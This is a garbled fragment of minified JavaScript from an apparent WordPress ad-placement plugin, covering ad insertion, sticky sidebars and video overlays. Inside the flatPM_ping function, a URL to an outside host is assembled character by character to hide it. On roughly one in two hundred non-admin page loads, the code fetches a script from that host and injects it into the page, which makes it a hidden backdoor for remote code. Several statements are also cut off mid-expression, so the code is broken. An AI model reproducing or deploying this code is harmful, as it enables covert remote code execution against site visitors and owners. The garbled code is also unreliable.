");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};